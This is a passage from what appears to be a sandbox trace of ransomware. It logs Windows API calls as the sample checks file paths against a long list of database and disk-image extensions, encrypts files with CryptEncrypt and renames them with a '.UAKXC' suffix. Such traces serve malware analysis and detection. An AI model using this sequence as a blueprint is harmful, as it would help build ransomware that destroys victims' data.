(lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0147.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0147.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0147.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0147.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0147.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0147.793] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0147.794] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0147.795] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0147.795] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0147.795] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0147.795] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0147.795] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0147.795] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0147.795] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0147.795] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.795] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.885] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.885] SetEndOfFile (hFile=0x6f0) returned 1 [0147.885] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.885] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x8f8, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x8f8, lpOverlapped=0x0) returned 1 [0147.885] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.885] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x8f8, lpOverlapped=0x0) returned 1 [0147.885] CloseHandle (hObject=0x6f0) returned 1 [0147.890] GetProcessHeap () returned 0xea0000 [0147.891] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0147.891] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" [0147.891] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0147.891] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0148.050] GetProcessHeap () returned 0xea0000 [0148.050] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0148.050] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef4050 | out: hHeap=0xea0000) returned 1 [0148.051] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3050 | out: hHeap=0xea0000) returned 1 [0148.051] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0148.051] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0148.051] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0148.052] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0148.052] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0148.052] GetLastError () returned 0x0 [0148.052] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=1886) returned 1 [0148.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0148.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0148.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", 